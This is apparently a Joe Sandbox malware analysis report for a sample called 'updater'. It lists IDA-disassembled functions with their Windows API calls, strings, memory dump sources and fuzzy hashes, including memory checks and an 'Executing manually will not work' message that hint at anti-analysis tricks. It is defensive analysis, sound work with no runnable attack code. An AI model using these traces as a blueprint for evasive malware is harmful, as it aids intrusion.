Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 05ecf55287fbc005cd23a865998957d3e0ddc644ac1dbb8a37515ec98b33cae7
Instruction ID: 1a00d380bbd6addaec4fe622f360c609566d4d65105533f2a5d6d34635190106
Opcode Fuzzy Hash: 05ecf55287fbc005cd23a865998957d3e0ddc644ac1dbb8a37515ec98b33cae7
Instruction Fuzzy Hash: BE5148B1904219AFDF24DF64DC91AAEFBB9FF48304F1004AEB249A3341DB715A808F58

Function 017C62C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,017C66C0), ref: 017C62DE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 017C62EB
GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,017C66C0), ref: 017C62F1

Strings

GlobalMemoryStatusEx, xrefs: 017C62E5
kernel32.dll, xrefs: 017C62D9

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressGlobalHandleMemoryModuleProcStatus
String ID: GlobalMemoryStatusEx$kernel32.dll
API String ID: 2450578220-2840702992
Opcode ID: bb3626f630af398a6a6bc95fa1fa0f7ed63d4f1b6c4618cb52dbde929e58f847
Instruction ID: 2121acde55e48c5e9b93eecadb22e32855b350c9475a472acb89579f29cf0fd4
Opcode Fuzzy Hash: bb3626f630af398a6a6bc95fa1fa0f7ed63d4f1b6c4618cb52dbde929e58f847
Instruction Fuzzy Hash: 8B018CB464C2118FD712EFA8D8C1A54F7E2FB0A7A0B01449CF404DB356D335AC009B50

Function 017C62D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,017C66C0), ref: 017C62DE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 017C62EB
GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,017C66C0), ref: 017C62F1

Strings

GlobalMemoryStatusEx, xrefs: 017C62E5
kernel32.dll, xrefs: 017C62D9

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressGlobalHandleMemoryModuleProcStatus
String ID: GlobalMemoryStatusEx$kernel32.dll
API String ID: 2450578220-2840702992
Opcode ID: fab752991c5e4d9b963d8e50ca4be4b5bd210eae49673153bdf48f89657c68cf
Instruction ID: eba6a9a23b74bf2a70ef72ce36024efc52757e0d5c7fb0afb545eadf651f122f
Opcode Fuzzy Hash: fab752991c5e4d9b963d8e50ca4be4b5bd210eae49673153bdf48f89657c68cf
Instruction Fuzzy Hash: C0C09BD17572313D710031F51CD5DFED14CCC56951305146DB910D1206E6C45D0511F1

Function 00BD563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD569B
_memcpy_s.LIBCMT ref: 00BD570D
__read_nolock.LIBCMT ref: 00BD576B
__filbuf.LIBCMT ref: 00BD578E
_memset.LIBCMT ref: 00BD57D2

Part of subcall function 00BD8D58: __getptd_noexit.LIBCMT ref: 00BD8D58

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 7119e60191bf32702feafb87f9fe9c7ae603e242448050a9412a25dbbd793874
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 5B517E74A00B05DBDB349EA9888066EFBE5EF41360F7487ABE825963D4F770DD509B40

Function 00BB52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB52E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB534A
TranslateMessage.USER32(?), ref: 00BB5356
DispatchMessageW.USER32(?), ref: 00BB5360

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: fe0f1d7e7f269d050c54a98dbc78db12eaf9545e4132070a500fb8e0b59b6614
Instruction ID: f8deae21fdfaeef4d6cf982b17cd59524894ecab29907133f84c9b959d12a053
Opcode Fuzzy Hash: fe0f1d7e7f269d050c54a98dbc78db12eaf9545e4132070a500fb8e0b59b6614
Instruction Fuzzy Hash: BE31F230508B4A9BEB30CB65DC84BF937E8EB01340F2401EAE527972E1D7F19885D756

Function 00BB1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BB1275,SwapMouseButtons,00000004,?), ref: 00BB12A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BB1275,SwapMouseButtons,00000004,?), ref: 00BB12C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BB1275,SwapMouseButtons,00000004,?), ref: 00BB12EB

Strings

Control Panel\Mouse, xrefs: 00BB12A6

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 4bdd413fbcce119f70c11f5d4c5b620e3cbc0fc6bedd65bb99387fb89ddfc44d
Instruction ID: 8ee33d3da2a52ae314d188a205074fb659d72f7af3e293f1aa6c88fe38287d6a
Opcode Fuzzy Hash: 4bdd413fbcce119f70c11f5d4c5b620e3cbc0fc6bedd65bb99387fb89ddfc44d
Instruction Fuzzy Hash: BA111875510208BFDB208FA8DC84BFEBBECEF05741F504999E905D7110E6B19E4097A4

Function 00BC5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BC5B58

Part of subcall function 00BC56F8: _memset.LIBCMT ref: 00BC5787
Part of subcall function 00BC56F8: _wcscpy.LIBCMT ref: 00BC57DB
Part of subcall function 00BC56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC57EB

KillTimer.USER32(?,00000001,?,?), ref: 00BC5BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC5BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C00D7C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: dc454ac35cb23648d605d37cc8461ff607a1edb5c9f458e06e07b6af54134900
Instruction ID: b0536ccb5c91f3f2829a3cb82acc19483e60c141b90f551fed556dd849515e57
Opcode Fuzzy Hash: dc454ac35cb23648d605d37cc8461ff607a1edb5c9f458e06e07b6af54134900
Instruction Fuzzy Hash: 8821A474904B84AFE7728B648895FEABFECAF01308F1404DDE69A56282C7743EC4DB51

Function 017C6E15 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,017C6EA4), ref: 017C6E55
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,017C6EA4), ref: 017C6E64
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,017C6EA4), ref: 017C6E83
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 017C6E89

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: fc0d7d5089d1d0b667585eb8937b30bae181067204b1e33b782a76565f9eddcc
Instruction ID: 3513c40ca39cc6f1f1f586104cbf7aa5c499995280e38698e6364e8f6c43c237
Opcode Fuzzy Hash: fc0d7d5089d1d0b667585eb8937b30bae181067204b1e33b782a76565f9eddcc
Instruction Fuzzy Hash: AF111E70614209BEE750EF78CCD9F9EF7ECEB1CB10F600569B514E6295E7706A108B50

Function 017CA249 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,017CA669,00000000), ref: 017CA42A
MessageBoxA.USER32(00000000,no data,017CA669,00000000), ref: 017CA4A2

Strings

vqvdvnxn, xrefs: 017CA3FA
Executing manually will not work, xrefs: 017CA423

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Message
String ID: Executing manually will not work$vqvdvnxn
API String ID: 2030045667-1215980481
Opcode ID: b8a4fc956f90c2636bbec1521bf5c9e6d424adf9d7b35f5477d19562907f236d
Instruction ID: 8e5a2f4a77b4a8be98916d5338438a0cbb0e9ed98b2df1030e3f9930fc287967
Opcode Fuzzy Hash: b8a4fc956f90c2636bbec1521bf5c9e6d424adf9d7b35f5477d19562907f236d
Instruction Fuzzy Hash: D2A13A7294C77F8FDB168F288C68568FBB6ABD5F13B14819DD6008B14BF7B298028751

Function 00BC278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00BC49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BC27AF,?,00000001), ref: 00BC49F4

_free.LIBCMT ref: 00BFFB04
_free.LIBCMT ref: 00BFFB4B

Part of subcall function 00BC29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC2ADF

Strings

Bad directive syntax error, xrefs: 00BFFB33

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 701bc02ebcb61cc7452cd53debbd80e91a57176d4b6416878f61c113f60c2e94
Instruction ID: 547eafc15f94812b81723fa6109e8c8b48920bfa190de884914eb0bb95b1c2a0
Opcode Fuzzy Hash: 701bc02ebcb61cc7452cd53debbd80e91a57176d4b6416878f61c113f60c2e94
Instruction Fuzzy Hash: 8D917E7190021AAFCF14EFA4C891AFDB7F4FF05310F1085AAF915AB2A1DB709A49DB50

Function 00C19CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BC4AB2: __fread_nolock.LIBCMT ref: 00BC4AD0

_wcscmp.LIBCMT ref: 00C19DE1
_wcscmp.LIBCMT ref: 00C19DF4

Strings

FILE, xrefs: 00C19D2D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: d0afd8c031bb99fce7f39916753dc91cc7b5c9e664eef1a0b3df3cae1d1dfce3
Instruction ID: f5c5196e4c673079707a0536e91ee1919bdb79f17e47f7e01f1cc5ce4765fd7b
Opcode Fuzzy Hash: d0afd8c031bb99fce7f39916753dc91cc7b5c9e664eef1a0b3df3cae1d1dfce3
Instruction Fuzzy Hash: FD41D871A40209BADF21DAA4CC55FEFB7FDDF46710F00446AF900A7281DB719A449B65

Function 00BC31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C0032B
GetOpenFileNameW.COMDLG32(?), ref: 00C00375

Part of subcall function 00BD0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC2A58,?,00008000), ref: 00BD02A4

Part of subcall function 00BD09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BD09E4

Strings

X, xrefs: 00C00343

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 251040b25db04ba57d9c00a095dbd92f207d37b8fca51619120210de2f41fc6f
Instruction ID: dd56b5e43dc817fd9997bd12806a3a161820285077858753d06acbdba8911c29
Opcode Fuzzy Hash: 251040b25db04ba57d9c00a095dbd92f207d37b8fca51619120210de2f41fc6f
Instruction Fuzzy Hash: 8821A871A142889BCF51DFD8C845BEE7BF8AF49710F10409AE414B7241DBB55A88CFA1

Function 00C2D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f593025bf8da53be6bf62d769b6ffa555155ffe6b53bf0f4f61f19c2750a7d5d
Instruction ID: a15c21f27555717b096c09a998e145e100d8fbf2f1e20858223f94c085ca0a49
Opcode Fuzzy Hash: f593025bf8da53be6bf62d769b6ffa555155ffe6b53bf0f4f61f19c2750a7d5d
Instruction Fuzzy Hash: 72F158706083119FC714DF28D480A6ABBE5FF98314F14896EF8AA9B352D770E945CF82

Function 00BBAAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BD07EC
Part of subcall function 00BD07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BD07F4
Part of subcall function 00BD07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BD07FF
Part of subcall function 00BD07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BD080A
Part of subcall function 00BD07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BD0812
Part of subcall function 00BD07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD081A

Part of subcall function 00BCFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BBAC6B), ref: 00BCFFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BBAD08
OleInitialize.OLE32(00000000), ref: 00BBAD85
CloseHandle.KERNEL32(00000000), ref: 00BF2F56

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 531456fb959846b2bfe23796525643ba9ed11b6cefba3d9e10d943136737a39e
Instruction ID: 2ce6f54f97c80f181624782e05892b8cc7bdeddd6c33a376a647b61eb363a009
Opcode Fuzzy Hash: 531456fb959846b2bfe23796525643ba9ed11b6cefba3d9e10d943136737a39e
Instruction Fuzzy Hash: 4181A7B09093488EC799EF39AD89B5D7EE9FB5930471087AAE41CDB272EB704484DF50

Function 00BD593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00BD5953

Part of subcall function 00BDA39B: __NMSG_WRITE.LIBCMT ref: 00BDA3C2
Part of subcall function 00BDA39B: __NMSG_WRITE.LIBCMT ref: 00BDA3CC

__NMSG_WRITE.LIBCMT ref: 00BD595A

Part of subcall function 00BDA3F8: GetModuleFileNameW.KERNEL32(00000000,00C753BA,00000104,00000004,00000001,00BD1003), ref: 00BDA48A
Part of subcall function 00BDA3F8: ___crtMessageBoxW.LIBCMT ref: 00BDA538

Part of subcall function 00BD32CF: ___crtCorExitProcess.LIBCMT ref: 00BD32D5
Part of subcall function 00BD32CF: ExitProcess.KERNEL32 ref: 00BD32DE

Part of subcall function 00BD8D58: __getptd_noexit.LIBCMT ref: 00BD8D58

RtlAllocateHeap.NTDLL(01710000,00000000,00000001,?,00000004,?,?,00BD1003,?), ref: 00BD597F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: dc51abeff597bd8308f5f0501d2d1a033304541b84f8fd7db8c60753804f69fa
Instruction ID: fc2d00b7523f97fbd73de95ebc7c37ebbd8235d300a43e7da34531c2c4f878d5
Opcode Fuzzy Hash: dc51abeff597bd8308f5f0501d2d1a033304541b84f8fd7db8c60753804f69fa
Instruction Fuzzy Hash: 2701F935241B01DAD7212725ACA272EF2C9DF52771F6000EBF5189B3D2FE748D404665

Function 017C67D5 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 017C681B
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 017C6842
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 017C6867

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction ID: 0d0c7c65edf982aed2b11894d102210da536323add051e759f7fb7eb85954b4d
Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
Instruction Fuzzy Hash: 95110CB5E0021D6BDB11EA99DCC9BEFF3BCAF58710F0045A9F614E7245D7709A448BA0

Function 017C6BF9 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C3E
WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C56
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C62

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 73ca63fac6c3d9430ad217be6121253cdb6b2578832729baa01a1c5f206512e8
Instruction ID: 6f21422825c516217d8876d564b678413d54f34a4c0b366afa5151294d10d262
Opcode Fuzzy Hash: 73ca63fac6c3d9430ad217be6121253cdb6b2578832729baa01a1c5f206512e8
Instruction Fuzzy Hash: 8B01DF71A00308BEE720AAA89CDAFAEF7BCDB49F10F614579B510E32D0D7706E008664

Function 00C192C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C192D6

Part of subcall function 00BD2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD9C54,00000000,00BD8D5D,00BD59C3), ref: 00BD2F99
Part of subcall function 00BD2F85: GetLastError.KERNEL32(00000000,?,00BD9C54,00000000,00BD8D5D,00BD59C3), ref: 00BD2FAB

_free.LIBCMT ref: 00C192E7
_free.LIBCMT ref: 00C192F9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: c85a103273fcf7abcdd5af30da0702354807179a5e61e9200d925057a982d127
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 5DE0C2E160460253CA28A7386840EC3F7EC8F88311714086EB419D3242DE30E8809068

Function 00BB5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00BEE234

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
